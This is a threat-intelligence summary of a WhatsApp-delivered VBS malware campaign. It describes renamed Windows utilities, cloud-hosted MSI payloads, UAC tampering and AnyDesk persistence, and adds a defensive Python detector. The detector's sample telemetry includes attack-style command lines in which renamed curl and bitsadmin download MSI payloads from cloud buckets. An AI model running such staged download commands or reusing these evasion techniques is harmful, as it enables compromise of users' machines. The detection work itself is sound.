WhatsApp-delivered VBS malware abuses UAC bypass for persistent Windows compromise via cloud-hosted MSI payloads
Summary
A malware campaign observed since late February 2026 delivers malicious Visual Basic Script (VBS) files to Windows users via WhatsApp, executing multi-stage attacks to establish persistence and enable remote access. The attack chain uses renamed legitimate Windows utilities (e.g., curl.exe → netapi.dll, bitsadmin.exe → sc.exe) to evade detection, retrieves payloads from trusted cloud services (AWS S3, Tencent Cloud, Backblaze B2), and installs unsigned MSI packages. The malware weakens User Account Control (UAC) defenses by repeatedly attempting elevated cmd.exe execution, modifying registry keys under HKLM\Software\Microsoft\Win, and embedding persistence to survive reboots. This enables privilege escalation without user interaction and deployment of remote access tools like AnyDesk, facilitating data theft and secondary malware delivery.
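As an added detection example (not code from the article or from any vendor), the following Python checks process-creation telemetry for the renamed-utility pattern described above: a binary whose version-resource OriginalFileName is curl.exe or bitsadmin.exe but which runs under a different name, from C:\ProgramData, or fetches from cloud object storage. The flattened event format, the staging folder name, the bucket names and the cloud host suffixes are all assumptions constructed for this example.

```python
"""Flag executions of renamed Windows utilities of the kind described above.

Sysmon Event ID 1 records both the on-disk Image path and the OriginalFileName
from the binary's version resource, so curl.exe copied to netapi.dll still
reports OriginalFileName=curl.exe. Events below are constructed for this
example; the folder name, bucket names and host suffixes are assumptions.
"""
import ntpath
import re
from typing import List, Optional

# Utilities the campaign is reported to rename (page: curl.exe, bitsadmin.exe).
WATCHED_ORIGINALS = {"curl.exe", "bitsadmin.exe"}
# Assumed host suffixes for the three cloud services named on the page.
CLOUD_HOST_RE = re.compile(r"amazonaws\.com|myqcloud\.com|backblazeb2\.com", re.I)
STAGING_ROOT = "c:\\programdata\\"  # the page names C:\ProgramData as the drop location

def parse_event(line: str) -> dict:
    """Parse a flattened 'Key=Value|Key=Value' process-creation line (constructed format)."""
    return dict(kv.split("=", 1) for kv in line.split("|"))

def analyse(event: dict) -> Optional[dict]:
    """Return a finding listing every rule that fired, or None if nothing is suspicious."""
    image = event.get("Image", "")
    original = event.get("OriginalFileName", "").lower()
    name = ntpath.basename(image).lower()
    reasons = []
    if original in WATCHED_ORIGINALS and name != original:
        reasons.append(f"renamed {original} running as {name}")
    if not name.endswith(".exe"):
        reasons.append("process image without .exe extension")
    if image.lower().startswith(STAGING_ROOT) and original in WATCHED_ORIGINALS:
        reasons.append("download utility staged under ProgramData")
    if original in WATCHED_ORIGINALS and CLOUD_HOST_RE.search(event.get("CommandLine", "")):
        reasons.append("download utility fetching from cloud object storage")
    return {"image": image, "original": original, "reasons": reasons} if reasons else None

def scan(lines: List[str]) -> List[dict]:
    """Run analyse() over raw event lines and keep only the findings."""
    return [f for f in (analyse(parse_event(line)) for line in lines) if f]

SAMPLE_EVENTS = [  # constructed sample telemetry, not real campaign data
    r"Image=C:\ProgramData\.sys\netapi.dll|OriginalFileName=curl.exe|CommandLine=netapi.dll -s -o a.msi https://bucket.s3.amazonaws.com/a.msi",
    r"Image=C:\ProgramData\.sys\sc.exe|OriginalFileName=bitsadmin.exe|CommandLine=sc.exe /transfer j https://f.backblazeb2.com/b.msi C:\ProgramData\.sys\b.msi",
    r"Image=C:\Windows\System32\curl.exe|OriginalFileName=curl.exe|CommandLine=curl.exe https://example.test/",
    r"Image=C:\Windows\System32\sc.exe|OriginalFileName=sc.exe|CommandLine=sc.exe query",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["image"], "->", "; ".join(finding["reasons"]))
```

The two benign events (the real curl.exe and the real sc.exe in System32) produce no finding, while both staged copies are flagged on several rules at once, which is the signal a detection rule should key on rather than the file name alone.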
Timeline
- 01.04.2026 14:49 · 1 article
  WhatsApp-delivered VBS malware establishes persistent Windows compromise via UAC bypass and cloud-hosted MSI payloads
  Since late February 2026, a campaign has delivered malicious VBS files via WhatsApp to Windows users. Execution creates hidden directories in C:\ProgramData and drops renamed Windows utilities (e.g., curl.exe as netapi.dll) to blend into normal activity. Payloads are retrieved from AWS S3, Tencent Cloud, and Backblaze B2 using these renamed binaries, followed by installation of unsigned MSI packages. The malware weakens UAC defenses by repeatedly attempting elevated cmd.exe execution, modifying registry keys (HKLM\Software\Microsoft\Win), and embedding persistence to survive reboots. This enables privilege escalation without user interaction and deployment of remote access tools like AnyDesk.
  Sources:
  - Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass — thehackernews.com — 01.04.2026 14:49
Information Snippets
- Campaign active since late February 2026, delivering malicious VBS files via WhatsApp messages.
  First reported: 01.04.2026 14:49 · 1 source, 1 article
  - Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass — thehackernews.com — 01.04.2026 14:49
- Initial payload drops hidden folders in C:\ProgramData and renamed copies of Windows utilities (e.g., curl.exe → netapi.dll, bitsadmin.exe → sc.exe) to blend into normal activity.
  First reported: 01.04.2026 14:49 · 1 source, 1 article (same source as above)
- Secondary payloads retrieved from AWS S3, Tencent Cloud, and Backblaze B2 using the renamed binaries.
  First reported: 01.04.2026 14:49 · 1 source, 1 article (same source as above)
- Malware tampers with UAC settings by continuously attempting elevated cmd.exe execution and modifying registry entries under HKLM\Software\Microsoft\Win to achieve persistence.
  First reported: 01.04.2026 14:49 · 1 source, 1 article (same source as above)
- Unsigned MSI installers are deployed, including legitimate tools like AnyDesk, providing persistent remote access for exfiltration or additional malware deployment.
  First reported: 01.04.2026 14:49 · 1 source, 1 article (same source as above)